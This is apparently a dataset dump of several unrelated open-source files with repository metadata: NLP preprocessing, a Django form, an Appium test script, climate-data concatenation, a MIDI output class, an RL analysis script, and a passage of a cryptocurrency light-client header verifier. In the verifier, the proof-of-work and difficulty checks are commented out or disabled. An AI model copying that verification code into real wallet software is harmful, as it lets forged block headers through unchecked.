output_data.write(word[len(word)-1] + "/E ")
output_data.write("\n")
input_data.close()
output_data.close()
character_tagging(input_file, output_file)
# 定义'U'为未登陆新字, 空格为两头padding用途,并增加两个相应的向量表示
char_num = len(init_weight_wv)
idx2word[char_num] = u'U'
word2idx[u'U'] = char_num
idx2word[char_num+1] = u' '
word2idx[u' '] = char_num+1
init_weight_wv.append(np.random.randn(100,))
init_weight_wv.append(np.zeros(100,))
# In[21]:
# 分离word 和 label
with open(output_file) as f:
lines = f.readlines()
train_line = [[w[0] for w in line.split()] for line in lines]
train_label = [w[2] for line in lines for w in line.split()]
# In[17]:
# 文档转数字list
def sent2num(sentence, word2idx = word2idx, context = 7):
predict_word_num = []
for w in sentence:
# 文本中的字如果在词典中则转为数字,如果不在则设置为'U
if w in word2idx:
predict_word_num.append(word2idx[w])
else:
predict_word_num.append(word2idx[u'U'])
# 首尾padding
num = len(predict_word_num)
pad = int((context-1)*0.5)
for i in range(pad):
predict_word_num.insert(0,word2idx[u' '] )
predict_word_num.append(word2idx[u' '] )
train_x = []
for i in range(num):
train_x.append(predict_word_num[i:i+context])
return train_x
# In[53]:
# 输入字符list,输出数字list
sent2num(train_line[0])
# In[60]:
# 将所有训练文本转成数字list
train_word_num = []
for line in train_line:
train_word_num.extend(sent2num(line))
# In[62]:
print(len(train_word_num))
print(len(train_label))
# In[64]:
dump(train_word_num, open('train_word_num.pickle', 'wb'))
#train_word_num = load(open('train_word_num.pickle','rb'))
dump(train_label, open('train_label.pickle', 'wb'))
dump(sent2num, open('sent2num.pickle', 'wb'))
# In[22]:
def main():
pass
if __name__ == '__main__':
main() | [
"[email protected]"
] | |
d1ce2f47b5065975e22b593396c700d64efe1e9f | 8a3e2d3aa46224bb0fa8ff2351f3a0bb339b0abd | /my_site/campaign/forms.py | 3f7e74dbce84eaa30d8118c3816d03edc36af25e | [] | no_license | Mosaab4/Task | 85ceeab56b3ffe57049d3474c97964d51ace3471 | 4d0d250c06e97a74ce723e91addc9c17faef5b4e | refs/heads/master | 2020-03-23T15:33:53.417503 | 2018-07-20T21:37:14 | 2018-07-20T21:37:14 | 141,757,012 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 512 | py | from django import forms
from django.forms import SelectDateWidget
from .models import Campaign
class CampaignForm(forms.ModelForm):
stop_date = forms.DateField(
widget=forms.DateInput(
attrs={
'type': 'date',
'class': 'form-control'
}
)
)
class Meta:
model = Campaign
fields = (
'name',
'status',
'type',
'stop_date',
'description',
) | [
"[email protected]"
] | |
b8f92479cf86e0f5872b64f2bc3d32b9b1e0f0a4 | 32eeb97dff5b1bf18cf5be2926b70bb322e5c1bd | /benchmark/radiocell/testcase/allpreferencecases/precase_log.py | 5de436ca260389960142a69aa2c35fe93a6bb02c | [] | no_license | Prefest2018/Prefest | c374d0441d714fb90fca40226fe2875b41cf37fc | ac236987512889e822ea6686c5d2e5b66b295648 | refs/heads/master | 2021-12-09T19:36:24.554864 | 2021-12-06T12:46:14 | 2021-12-06T12:46:14 | 173,225,161 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,780 | py | #coding=utf-8
import os
import subprocess
import time
import traceback
from appium import webdriver
from appium.webdriver.common.touch_action import TouchAction
from selenium.common.exceptions import NoSuchElementException, WebDriverException
desired_caps = {
'platformName' : 'Android',
'deviceName' : 'Android Emulator',
'platformVersion' : '4.4',
'appPackage' : 'org.openbmap',
'appActivity' : 'org.openbmap.activities.StartscreenActivity',
'resetKeyboard' : True,
'androidCoverage' : 'org.openbmap/org.openbmap.JacocoInstrumentation',
'noReset' : True
}
def command(cmd, timeout=5):
p = subprocess.Popen(cmd, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True)
time.sleep(timeout)
p.terminate()
return
def getElememt(driver, str) :
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str)
except NoSuchElementException:
time.sleep(1)
else:
return element
os.popen("adb shell input tap 50 50")
element = driver.find_element_by_android_uiautomator(str)
return element
def getElememtBack(driver, str1, str2) :
for i in range(0, 2, 1):
try:
element = driver.find_element_by_android_uiautomator(str1)
except NoSuchElementException:
time.sleep(1)
else:
return element
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str2)
except NoSuchElementException:
time.sleep(1)
else:
return element
os.popen("adb shell input tap 50 50")
element = driver.find_element_by_android_uiautomator(str2)
return element
def swipe(driver, startxper, startyper, endxper, endyper) :
size = driver.get_window_size()
width = size["width"]
height = size["height"]
try:
driver.swipe(start_x=int(width * startxper), start_y=int(height * startyper), end_x=int(width * endxper),
end_y=int(height * endyper), duration=1000)
except WebDriverException:
time.sleep(1)
driver.swipe(start_x=int(width * startxper), start_y=int(height * startyper), end_x=int(width * endxper),
end_y=int(height * endyper), duration=1000)
return
def scrollToFindElement(driver, str) :
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str)
elements = driver.find_elements_by_android_uiautomator(str)
if (len(elements) > 1) :
for temp in elements :
if temp.get_attribute("enabled") == "true" :
element = temp
break
except NoSuchElementException:
swipe(driver, 0.5, 0.55, 0.5, 0.2)
else :
return element
for i in range(0, 4, 1):
try:
element = driver.find_element_by_android_uiautomator(str)
elements = driver.find_elements_by_android_uiautomator(str)
if (len(elements) > 1):
for temp in elements:
if temp.get_attribute("enabled") == "true":
element = temp
break
except NoSuchElementException:
swipe(driver, 0.5, 0.2, 0.5, 0.55)
else :
return element
return
def scrollToClickElement(driver, str) :
element = scrollToFindElement(driver, str)
if element is None :
return
else :
element.click()
def clickInList(driver, str) :
element = None
if (str is None) :
candidates = driver.find_elements_by_class_name("android.widget.CheckedTextView")
if len(candidates) >= 1 and checkWindow(driver):
element = candidates[len(candidates)-1]
else :
element = scrollToFindElement(driver, str)
if element is not None :
element.click()
else :
if checkWindow(driver) :
driver.press_keycode(4)
def clickOnCheckable(driver, str, value = "true") :
parents = driver.find_elements_by_class_name("android.widget.LinearLayout")
for parent in parents:
try :
parent.find_element_by_android_uiautomator(str)
lists = parent.find_elements_by_class_name("android.widget.LinearLayout")
if len(lists) == 1 :
innere = parent.find_element_by_android_uiautomator("new UiSelector().checkable(true)")
nowvalue = innere.get_attribute("checked")
if (nowvalue != value) :
innere.click()
break
except NoSuchElementException:
continue
def typeText(driver, value) :
element = getElememt(driver, "new UiSelector().className(\"android.widget.EditText\")")
element.clear()
element.send_keys(value)
enterelement = getElememt(driver, "new UiSelector().text(\"OK\")")
if (enterelement is None) :
if checkWindow(driver):
driver.press_keycode(4)
else :
enterelement.click()
def checkWindow(driver) :
dsize = driver.get_window_size()
nsize = driver.find_element_by_class_name("android.widget.FrameLayout").size
if dsize['height'] > nsize['height']:
return True
else :
return False
def conscript(driver):
try:
driver.find_element_by_android_uiautomator("new UiSelector().text(\"OK\")").click()
time.sleep(0.1)
except NoSuchElementException:
time.sleep(0.1)
return
# preference setting and exit
try :
starttime = time.time()
driver = webdriver.Remote('http://localhost:4723/wd/hub', desired_caps)
os.popen("adb shell am start -n org.openbmap/org.openbmap.activities.AdvancedSettingsActivity -a test")
scrollToClickElement(driver, "new UiSelector().text(\"Ignore low battery\")")
conscript(driver)
clickOnCheckable(driver, "new UiSelector().text(\"Ignore low battery\")", "true")
scrollToClickElement(driver, "new UiSelector().text(\"Cleanup old sessions\")")
conscript(driver)
clickOnCheckable(driver, "new UiSelector().text(\"Cleanup old sessions\")", "true")
scrollToClickElement(driver, "new UiSelector().text(\"On export, create a GPX file locally on your device\")")
conscript(driver)
clickOnCheckable(driver, "new UiSelector().text(\"On export, create a GPX file locally on your device\")", "true")
scrollToClickElement(driver, "new UiSelector().text(\"GPX verbosity\")")
clickInList(driver, "new UiSelector().text(\"Waypoints only\")")
conscript(driver)
scrollToClickElement(driver, "new UiSelector().text(\"Wireless scan mode\")")
clickInList(driver, "new UiSelector().text(\"Full power mode\")")
conscript(driver)
scrollToClickElement(driver, "new UiSelector().text(\"Anonymise SSID in upload files\")")
conscript(driver)
clickOnCheckable(driver, "new UiSelector().text(\"Anonymise SSID in upload files\")", "true")
scrollToClickElement(driver, "new UiSelector().text(\"Skip upload\")")
conscript(driver)
clickOnCheckable(driver, "new UiSelector().text(\"Skip upload\")", "true")
scrollToClickElement(driver, "new UiSelector().text(\"Keep uploaded files\")")
conscript(driver)
clickOnCheckable(driver, "new UiSelector().text(\"Keep uploaded files\")", "true")
driver.press_keycode(4)
time.sleep(2)
os.popen("adb shell am start -n org.openbmap/org.openbmap.activities.SettingsActivity -a test")
scrollToClickElement(driver, "new UiSelector().text(\"Anonymous upload\")")
conscript(driver)
clickOnCheckable(driver, "new UiSelector().text(\"Anonymous upload\")", "true")
scrollToClickElement(driver, "new UiSelector().text(\"Save Cells\")")
conscript(driver)
clickOnCheckable(driver, "new UiSelector().text(\"Save Cells\")", "false")
scrollToClickElement(driver, "new UiSelector().text(\"Save WiFis\")")
conscript(driver)
clickOnCheckable(driver, "new UiSelector().text(\"Save WiFis\")", "false")
scrollToClickElement(driver, "new UiSelector().text(\"Keep screen on\")")
conscript(driver)
clickOnCheckable(driver, "new UiSelector().text(\"Keep screen on\")", "false")
driver.press_keycode(4)
time.sleep(2)
except Exception, e:
print 'FAIL'
print 'str(e):\t\t', str(e)
print 'repr(e):\t', repr(e)
print traceback.format_exc()
else:
print 'OK'
finally:
cpackage = driver.current_package
endtime = time.time()
print 'consumed time:', str(endtime - starttime), 's'
command("adb shell am broadcast -a com.example.pkg.END_EMMA --es name \"preference_pre\"")
jacocotime = time.time()
print 'jacoco time:', str(jacocotime - endtime), 's'
driver.quit()
| [
"[email protected]"
] | |
d600b8b2c4530936de8246363f50622650126ebf | facb8b9155a569b09ba66aefc22564a5bf9cd319 | /wp2/era5_scripts/02_preprocessing/concat82/62-tideGauge.py | f2b56a3028ad9bd3ebd829ae2f793963efbc05f3 | [] | no_license | moinabyssinia/modeling-global-storm-surges | 13e69faa8f45a1244a964c5de4e2a5a6c95b2128 | 6e385b2a5f0867df8ceabd155e17ba876779c1bd | refs/heads/master | 2023-06-09T00:40:39.319465 | 2021-06-25T21:00:44 | 2021-06-25T21:00:44 | 229,080,191 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,480 | py | # -*- coding: utf-8 -*-
"""
Created on Tue May 13 10:02:00 2020
---------------------------------------------------------
This script concatenates yearly predictor files
Browses the predictor folders for the chosen TG
Concatenates the yearly csvs for the chosen predictor
Saves the concatenated csv in a separate directory
---------------------------------------------------------
@author: Michael Tadesse
"""
#%% import packages
import os
import pandas as pd
#%% define directories
home = '/lustre/fs0/home/mtadesse/erafive_localized'
out_path = '/lustre/fs0/home/mtadesse/eraFiveConcat'
#cd to the home dir to get TG information
os.chdir(home)
tg_list = os.listdir()
x = 62
y = 63
#looping through TGs
for t in range(x, y):
tg = tg_list[t]
print(tg)
#concatenate folder paths
os.chdir(os.path.join(home, tg))
#defining the folders for predictors
#choose only u, v, and slp
where = os.getcwd()
csv_path = {'slp' : os.path.join(where, 'slp'),\
"wnd_u": os.path.join(where, 'wnd_u'),\
'wnd_v' : os.path.join(where, 'wnd_v')}
#%%looping through predictors
for pred in csv_path.keys():
os.chdir(os.path.join(home, tg))
# print(tg, ' ', pred, '\n')
#cd to the chosen predictor
os.chdir(pred)
#%%looping through the yearly csv files
count = 1
for yr in os.listdir():
print(pred, ' ', yr)
if count == 1:
dat = pd.read_csv(yr)
# print('original size is: {}'.format(dat.shape))
else:
#remove the header of the subsequent csvs before merging
# dat_yr = pd.read_csv(yr, header=None).iloc[1:,:]
dat_yr = pd.read_csv(yr)
dat = pd.concat([dat, dat_yr], axis = 0)
# print('concatenated size is: {}'.format(dat.shape))
count+=1
print(dat.shape)
#saving concatenated predictor
#cd to the saving location
os.chdir(out_path)
#create/cd to the tg folder
try:
os.makedirs(tg)
os.chdir(tg) #cd to it after creating it
except FileExistsError:
#directory already exists
os.chdir(tg)
#save as csv
pred_name = '.'.join([pred, 'csv'])
dat.to_csv(pred_name)
| [
"[email protected]"
] | |
f8df77cd858240028f56eee704517225c5904b92 | 94a69d05880fdb03ad915a63f3575ff01e5df0e6 | /isobar/io/midi/output.py | fbe793950ad0b3554dc0d03d9073936ce9a6c46e | [
"MIT"
] | permissive | ideoforms/isobar | 06f2a5553b33e8185c6f9aed06224811589f7b70 | 12b03500ea882f17c3521700f7f74b0e36e4b335 | refs/heads/master | 2023-07-20T20:31:13.040686 | 2023-07-17T19:19:01 | 2023-07-17T19:19:01 | 2,155,202 | 320 | 53 | MIT | 2023-05-01T21:29:46 | 2011-08-04T15:12:03 | Python | UTF-8 | Python | false | false | 3,799 | py | import os
import mido
import logging
from ..output import OutputDevice
from ...exceptions import DeviceNotFoundException
from ...constants import MIDI_CLOCK_TICKS_PER_BEAT
log = logging.getLogger(__name__)
class MidiOutputDevice (OutputDevice):
def __init__(self, device_name=None, send_clock=False, virtual=False):
"""
Create a MIDI output device.
Use `isobar.get_midi_output_names()` to query all available devices.
Args:
device_name (str): The name of the target device to use.
The default MIDI output device name can also be specified
with the environmental variable ISOBAR_DEFAULT_MIDI_OUT.
send_clock (bool): Whether to send clock sync/reset messages.
virtual (bool): Whether to create a "virtual" rtmidi device.
"""
try:
if device_name is None:
device_name = os.getenv("ISOBAR_DEFAULT_MIDI_OUT")
self.midi = mido.open_output(device_name, virtual=virtual)
except (RuntimeError, SystemError, OSError):
raise DeviceNotFoundException("Could not find MIDI device")
self.send_clock = send_clock
log.info("Opened MIDI output: %s" % self.midi.name)
def start(self):
"""
Sends a MIDI start message to the output device.
"""
if self.send_clock:
msg = mido.Message("start")
self.midi.send(msg)
def stop(self):
"""
Sends a MIDI stop message to the output device.
"""
if self.send_clock:
msg = mido.Message("stop")
self.midi.send(msg)
@property
def ticks_per_beat(self):
"""
The number of clock ticks per beat.
For MIDI devices, which is fixed at the MIDI standard of 24.
"""
return MIDI_CLOCK_TICKS_PER_BEAT
def tick(self):
if self.send_clock:
msg = mido.Message("clock")
self.midi.send(msg)
def note_on(self, note=60, velocity=64, channel=0):
log.debug("[midi] Note on (channel = %d, note = %d, velocity = %d)" % (channel, note, velocity))
msg = mido.Message('note_on', note=int(note), velocity=int(velocity), channel=int(channel))
self.midi.send(msg)
def note_off(self, note=60, channel=0):
log.debug("[midi] Note off (channel = %d, note = %d)" % (channel, note))
msg = mido.Message('note_off', note=int(note), channel=int(channel))
self.midi.send(msg)
def all_notes_off(self):
log.debug("[midi] All notes off")
for channel in range(16):
for note in range(128):
msg = mido.Message('note_off', note=int(note), channel=int(channel))
self.midi.send(msg)
def control(self, control=0, value=0, channel=0):
log.debug("[midi] Control (channel %d, control %d, value %d)" % (channel, control, value))
msg = mido.Message('control_change', control=int(control), value=int(value), channel=int(channel))
self.midi.send(msg)
def program_change(self, program=0, channel=0):
log.debug("[midi] Program change (channel %d, program_change %d)" % (channel, program))
msg = mido.Message('program_change', program=int(program), channel=int(channel))
self.midi.send(msg)
def pitch_bend(self, pitch=0, channel=0):
log.debug("[midi] Pitch bend (channel %d, pitch %d)" % (channel, pitch))
msg = mido.Message('pitchwheel', pitch=int(pitch), channel=int(channel))
self.midi.send(msg)
def set_song_pos(self, pos=0):
msg = mido.Message('songpos', pos=pos)
self.midi.send(msg)
def __del__(self):
if hasattr(self, "midi"):
del self.midi
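
# Minimal usage sketch (illustrative, not part of the original module; the
# port is left as None so mido falls back to the system default, and
# mido.get_output_names() lists the real devices). At 120 BPM the
# 24-ticks-per-beat clock above fires every 60 / (120 * 24) ~= 0.0208 s.
if __name__ == "__main__":
    import time
    out = MidiOutputDevice(device_name=None)
    out.note_on(note=60, velocity=100, channel=0)  # middle C
    time.sleep(0.5)
    out.note_off(note=60, channel=0)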
| [
"[email protected]"
] | |
7120668501fd24173b3eeac50a49ced2c1bd7cea | 39fbf1f554651f089dbf8478f009e38a2cbb7c25 | /RL/analyze.random-search.py | 282c8597a966b866b1b837a297a921ce6bfac83d | [
"Apache-2.0"
] | permissive | Libardo1/icnn | 20b323aed5a3975c8083fb8f6234305f8cd275d1 | 2056ca88d0b0dac4d8ee1a48a8b8a9f676bafd4f | refs/heads/master | 2021-01-20T15:23:06.016978 | 2016-08-01T19:35:32 | 2016-08-01T19:35:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,154 | py | #!/usr/bin/env python3
import argparse
import os
import sys
import shutil
from subprocess import Popen, PIPE
import json
import operator
import numpy as np
import numpy.random as npr
pythonCmd = 'python3'
rlDir = os.path.dirname(os.path.realpath(__file__))
plotSrc = os.path.join(rlDir, 'plot-all.py')
mainSrc = os.path.join(rlDir, 'src', 'main.py')
all_algs = ['DDPG', 'NAF', 'ICNN']
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--expDir', type=str, default='output.random-search')
args = parser.parse_args()
bestParams, bestVals = {}, {}
for task in os.listdir(args.expDir):
taskDir = os.path.join(args.expDir, task)
if os.path.isdir(taskDir):
bestParams[task], bestVals[task] = analyzeTask(taskDir)
orgTableP = os.path.join(args.expDir, 'table.org')
with open(orgTableP, 'w') as f:
f.write('| Task | DDPG | NAF | ICNN |\n')
f.write('|------+------+-----+------|\n')
for task, algs in sorted(bestVals.items()):
bestAlg = sorted(algs.items(), key=operator.itemgetter(1),
reverse=True)[0][0]
def getStr(alg):
s = '{:.2f} ({:.2f})'.format(algs[alg][0], int(algs[alg][1]))
if alg == bestAlg:
s = '*{}*'.format(s)
return s
f.write('| {:s} | {} | {} | {} |\n'.format(
task, getStr('DDPG'), getStr('NAF'), getStr('ICNN')))
f.flush()
print('Created {}'.format(orgTableP))
texTableP = os.path.join(args.expDir, 'table.tex')
os.system('pandoc {} --to latex --output {}'.format(orgTableP, texTableP))
for task, algs in bestParams.items():
for alg, params in algs.items():
del params['copy']
del params['env']
del params['force']
del params['gdb']
del params['gymseed']
del params['model']
del params['monitor']
del params['npseed']
del params['outdir']
del params['summary']
del params['tfseed']
del params['thread']
bestParamsP = os.path.join(args.expDir, 'bestParams.json')
with open(bestParamsP, 'w') as f:
json.dump(bestParams, f, indent=2, sort_keys=True)
print('Created {}'.format(bestParamsP))
def analyzeTask(taskDir):
bestParams = {}
bestVals = {}
print('=== {}'.format(taskDir))
with open(os.path.join(taskDir, 'analysis.txt'), 'w') as f:
for alg in all_algs:
algDir = os.path.join(taskDir, alg)
if os.path.exists(algDir):
f.write('\n=== {}\n\n'.format(alg))
exps = {}
for exp in sorted(os.listdir(algDir)):
expDir = os.path.join(algDir, exp)
testData = np.loadtxt(os.path.join(expDir, 'test.log'))
testRew = testData[:,1]
N = 10
if np.any(np.isnan(testRew)) or testRew.size <= N:
continue
testRew_ = np.array([sum(testRew[i-N:i])/N for
i in range(N, len(testRew))])
exps[exp] = [testRew_[-1], testRew_.sum()]
f.write((' + Experiment {}: Final rolling reward of {} '+
'with a cumulative reward of {}\n').format(
*([exp] + exps[exp])))
s = sorted(exps.items(), key=operator.itemgetter(1), reverse=True)
best = s[0]
bestExp = best[0]
f.write('\n--- Best of {} obtained in experiment {}\n'.format(
best[1], bestExp))
flagsP = os.path.join(algDir, bestExp, 'flags.json')
with open(flagsP, 'r') as flagsF:
f.write(flagsF.read()+'\n')
flagsF.seek(0)
flags = json.load(flagsF)
bestParams[alg] = flags
bestVals[alg] = best[1]
return bestParams, bestVals
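
# Vectorized equivalent of the rolling-reward loop in analyzeTask above
# (illustrative): sum(testRew[i-N:i])/N for i in range(N, len(testRew)) is a
# moving average over every window that ends before the final sample, i.e. a
# 'valid' convolution over testRew[:-1]; it produces the same values.
def rolling_reward(test_rew, n=10):
    return np.convolve(test_rew[:-1], np.ones(n) / n, mode='valid')
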
if __name__=='__main__':
main()
| [
"[email protected]"
] | |
d3b3c31607d7dae00db90b7471be4d1ecd25d66a | cf652cb90f9d6b22b5943e7d025af631214a904d | /lib/blockchain.py | e96bbf8e40728c8ac2f4b478da933ca46f6dbed7 | [
"MIT"
] | permissive | ddude1/TestLite | 02919c68013d2ede9195d618d94260b842a5e292 | 3f3c00e4ef03dd9b23b99b02f9a8895da8d65aef | refs/heads/master | 2022-12-11T12:22:25.029101 | 2018-06-13T14:11:51 | 2018-06-13T14:11:51 | 136,489,568 | 0 | 0 | MIT | 2022-09-23T21:47:03 | 2018-06-07T14:31:31 | Python | UTF-8 | Python | false | false | 15,454 | py | # Electrum - lightweight Bitcoin client
# Copyright (C) 2012 [email protected]
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import threading
from . import util
from . import bitcoin
from .bitcoin import *
import litecoin_scrypt
target_timespan = 24 * 60 * 60 # Xgox: 1 day
target_spacing = 3 * 60 # Xgox: 3 minute
interval = target_timespan // target_spacing # 480
max_target = 0x00000ffff0000000000000000000000000000000000000000000000000000000
START_CALC_HEIGHT = 70560
USE_DIFF_CALC = False
def bits_to_target(bits):
    """Convert a compact representation to an integer target."""
    MM = 256*256*256
    a = bits % MM
    if a < 0x8000:
        a *= 256
    # integer division: bits // MM extracts the exponent byte (Python 3 safe)
    target = a * pow(2, 8 * (bits // MM - 3))
    return target
def target_to_bits(target):
    """Convert an integer target to compact representation."""
    MM = 256*256*256
    c = ("%064X" % target)[2:]
    i = 31
    while c[0:2] == "00":
        c = c[2:]
        i -= 1
    c = int('0x' + c[0:6], 16)
    if c >= 0x800000:
        c //= 256  # integer division keeps the mantissa an int under Python 3
        i += 1
    new_bits = c + MM * i
    return new_bits
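
# Worked round trip (illustrative): Bitcoin's genesis compact bits 0x1d00ffff
# decode to 0xffff * 2 ** (8 * (0x1d - 3)), i.e. 0x00000000ffff0000...0000,
# and target_to_bits() maps that target back to 0x1d00ffff, so the two
# functions invert each other.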
def serialize_header(res):
if res.get('version') == 1:
s = int_to_hex(res.get('version'), 4) \
+ rev_hex(res.get('prev_block_hash')) \
+ rev_hex(res.get('merkle_root')) \
+ int_to_hex(int(res.get('timestamp')), 4) \
+ int_to_hex(int(res.get('bits')), 4) \
+ int_to_hex(int(res.get('nonce')), 4)
#+ rev_hex(res.get('nAccumulatorCheckpoint'))
return s
s = int_to_hex(res.get('version'), 4) \
+ rev_hex(res.get('prev_block_hash')) \
+ rev_hex(res.get('merkle_root')) \
+ int_to_hex(int(res.get('timestamp')), 4) \
+ int_to_hex(int(res.get('bits')), 4) \
+ int_to_hex(int(res.get('nonce')), 4) \
+ rev_hex(res.get('nAccumulatorCheckpoint'))
return s
def deserialize_header(s, height):
hex_to_int = lambda s: int('0x' + bh2u(s[::-1]), 16)
h = {}
h['version'] = hex_to_int(s[0:4])
h['prev_block_hash'] = hash_encode(s[4:36])
h['merkle_root'] = hash_encode(s[36:68])
h['timestamp'] = hex_to_int(s[68:72])
h['bits'] = hex_to_int(s[72:76])
h['nonce'] = hex_to_int(s[76:80])
h['nAccumulatorCheckpoint'] = hash_encode(s[80:112])
h['block_height'] = height
return h
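
# Byte layout parsed above (112 bytes per serialized header, matching the
# slices): 0-3 version, 4-35 prev_block_hash, 36-67 merkle_root,
# 68-71 timestamp, 72-75 bits, 76-79 nonce, 80-111 nAccumulatorCheckpoint.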
def hash_header(header):
if header is None:
return '0' * 64
if header.get('prev_block_hash') is None:
header['prev_block_hash'] = '00'*32
srl_header=serialize_header(header)
return hash_encode(PoWHash(bfh(srl_header)))
blockchains = {}
def read_blockchains(config):
blockchains[0] = Blockchain(config, 0, None)
fdir = os.path.join(util.get_headers_dir(config), 'forks')
if not os.path.exists(fdir):
os.mkdir(fdir)
l = filter(lambda x: x.startswith('fork_'), os.listdir(fdir))
l = sorted(l, key = lambda x: int(x.split('_')[1]))
for filename in l:
checkpoint = int(filename.split('_')[2])
parent_id = int(filename.split('_')[1])
b = Blockchain(config, checkpoint, parent_id)
blockchains[b.checkpoint] = b
return blockchains
def check_header(header):
if type(header) is not dict:
return False
for b in blockchains.values():
if b.check_header(header):
return b
return False
def can_connect(header):
for b in blockchains.values():
if b.can_connect(header):
return b
return False
class Blockchain(util.PrintError):
"""
Manages blockchain headers and their verification
"""
def __init__(self, config, checkpoint, parent_id):
self.config = config
self.catch_up = None # interface catching up
self.checkpoint = checkpoint
self.parent_id = parent_id
self.lock = threading.Lock()
with self.lock:
self.update_size()
def parent(self):
return blockchains[self.parent_id]
def get_max_child(self):
children = list(filter(lambda y: y.parent_id==self.checkpoint, blockchains.values()))
return max([x.checkpoint for x in children]) if children else None
def get_checkpoint(self):
mc = self.get_max_child()
return mc if mc is not None else self.checkpoint
def get_branch_size(self):
return self.height() - self.get_checkpoint() + 1
def get_name(self):
return self.get_hash(self.get_checkpoint()).lstrip('00')[0:10]
def check_header(self, header):
header_hash = hash_header(header)
height = header.get('block_height')
return header_hash == self.get_hash(height)
def fork(parent, header):
checkpoint = header.get('block_height')
self = Blockchain(parent.config, checkpoint, parent.checkpoint)
open(self.path(), 'w+').close()
self.save_header(header)
return self
def height(self):
return self.checkpoint + self.size() - 1
def size(self):
with self.lock:
return self._size
def update_size(self):
p = self.path()
self._size = os.path.getsize(p)//bitcoin.NetworkConstants.HEADER_SIZE if os.path.exists(p) else 0
def verify_header(self, header, prev_header, bits, target):
prev_hash = hash_header(prev_header)
_hash = hash_header(header)
if prev_hash != header.get('prev_block_hash'):
raise BaseException("prev hash mismatch: %s vs %s" % (prev_hash, header.get('prev_block_hash')))
if bitcoin.NetworkConstants.TESTNET:
return
#if bits != header.get('bits'):
# raise BaseException("bits mismatch: %s vs %s" % (bits, header.get('bits')))
#if int('0x' + _hash, 16) > target:
# raise BaseException("insufficient proof of work: %s vs target %s" % (int('0x' + _hash, 16), target))
        if USE_DIFF_CALC:
            if header.get('block_height', 0) > START_CALC_HEIGHT:
                assert bits == header.get('bits'), "bits mismatch: %s vs %s" \
                    % (bits, header.get('bits'))
                # hash_header is a module-level function, not a method,
                # and _hash has already been computed above
                assert int('0x' + _hash, 16) <= target, \
                    "insufficient proof of work: %s vs target %s" % \
                    (int('0x' + _hash, 16), target)
def verify_chunk(self, index, data):
num = len(data) // bitcoin.NetworkConstants.HEADER_SIZE
prev_header = None
if index != 0:
prev_header = self.read_header(index * 2016 - 1)
chain = []
for i in range(num):
raw_header = data[i*bitcoin.NetworkConstants.HEADER_SIZE:(i+1) * bitcoin.NetworkConstants.HEADER_SIZE]
header = deserialize_header(raw_header, index*2016 + i)
height = index*2016 + i
header['block_height'] = height
chain.append(header)
bits, target = self.get_target(height, chain)
self.verify_header(header, prev_header, bits, target)
prev_header = header
def path(self):
d = util.get_headers_dir(self.config)
filename = 'blockchain_headers' if self.parent_id is None else os.path.join('forks', 'fork_%d_%d'%(self.parent_id, self.checkpoint))
return os.path.join(d, filename)
def save_chunk(self, index, chunk):
filename = self.path()
d = (index * 2016 - self.checkpoint) * bitcoin.NetworkConstants.HEADER_SIZE
if d < 0:
chunk = chunk[-d:]
d = 0
self.write(chunk, d)
self.swap_with_parent()
def swap_with_parent(self):
if self.parent_id is None:
return
parent_branch_size = self.parent().height() - self.checkpoint + 1
if parent_branch_size >= self.size():
return
self.print_error("swap", self.checkpoint, self.parent_id)
parent_id = self.parent_id
checkpoint = self.checkpoint
parent = self.parent()
with open(self.path(), 'rb') as f:
my_data = f.read()
with open(parent.path(), 'rb') as f:
f.seek((checkpoint - parent.checkpoint)*bitcoin.NetworkConstants.HEADER_SIZE)
parent_data = f.read(parent_branch_size*bitcoin.NetworkConstants.HEADER_SIZE)
self.write(parent_data, 0)
parent.write(my_data, (checkpoint - parent.checkpoint)*bitcoin.NetworkConstants.HEADER_SIZE)
# store file path
for b in blockchains.values():
b.old_path = b.path()
# swap parameters
self.parent_id = parent.parent_id; parent.parent_id = parent_id
self.checkpoint = parent.checkpoint; parent.checkpoint = checkpoint
self._size = parent._size; parent._size = parent_branch_size
# move files
for b in blockchains.values():
if b in [self, parent]: continue
if b.old_path != b.path():
self.print_error("renaming", b.old_path, b.path())
os.rename(b.old_path, b.path())
# update pointers
blockchains[self.checkpoint] = self
blockchains[parent.checkpoint] = parent
def write(self, data, offset):
filename = self.path()
with self.lock:
with open(filename, 'rb+') as f:
if offset != self._size*bitcoin.NetworkConstants.HEADER_SIZE:
f.seek(offset)
f.truncate()
f.seek(offset)
f.write(data)
f.flush()
os.fsync(f.fileno())
self.update_size()
def save_header(self, header):
height = header.get('block_height')
delta = height - self.checkpoint
srl_header = serialize_header(header)
if header.get('block_height') == 0:
srl_header+="0000000000000000000000000000000000000000000000000000000000000000"
data = bfh(srl_header)
assert delta == self.size()
header_size = bitcoin.NetworkConstants.HEADER_SIZE
#if header.get('block_height') == 0:
# header_size = 80
assert len(data) == header_size
self.write(data, delta*header_size)
self.swap_with_parent()
def read_header(self, height):
assert self.parent_id != self.checkpoint
if height < 0:
return
if height < self.checkpoint:
return self.parent().read_header(height)
if height > self.height():
return
delta = height - self.checkpoint
header_size = bitcoin.NetworkConstants.HEADER_SIZE #if not height else 80
name = self.path()
